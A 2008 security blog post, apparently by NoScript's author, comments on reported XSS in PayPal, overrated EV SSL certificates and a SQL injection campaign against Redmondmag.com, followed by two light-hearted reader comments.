17
05
2008
PayPal XSSed, Redmondmag.com SQL Injected
Posted by: Giorgio in XSS, SQL, Mozilla, Security, NoScript
The Register columns are getting better and better at web security related content.
In one single article, Dan Goodin managed to:
- Report an XSS hole in PayPal “safe” area (the wet dream of all XSS kiddies), enabling all sort of profitable scams from credential stealing to automated transactions riding the session of an authenticated user.
- Make a very valid point about extended validation SSL certificates being overrated, if not just an expensive joke, because the green bar is more than happy of “certifying” XSS compromised pages as legitimate (obviously): in other words, the perfect phishing works even better if you’ve got a modern, secure browser supporting EV SSL :)
- Deride McAfee’s Hacker Safe one more time for its ridiculous stance on XSS vulnerabilities — OK, that’s just beating a dead horse…
Just a little addition of mine: despite PayPal’s safe browser nonsense, the browser which can save you from XSS exploitation is only one.
In other news, Remond - The Independent Voice of the Microsoft IT Community, formerly known as the Microsoft Certified Professional Magazine, joined the party of the ASP/MS SQL Server sites SQL Injected to serve JavaScript malware.
Considering the wide coverage this epidemics enjoyed in the past week, I wonder what a “Certified Professional” usually reads aside Microsoft EULAs…
May 19th, 2008 at 2:21 pm
Uh… that’s pretty, hm, sort of scary. I always thought it was only a matter of time. And it was :P
BTW, is it me or you always tell people that NoScript is the solution to XSS, security holes, terrorism, cancer, hunger and other stuff? :P
May 19th, 2008 at 2:46 pm
@Rafael:
I’m afraid NoScript is for XSS and other web security holes only.
For terrorism, cancer, hunger and other stuff, you need to install NoCapitalism :)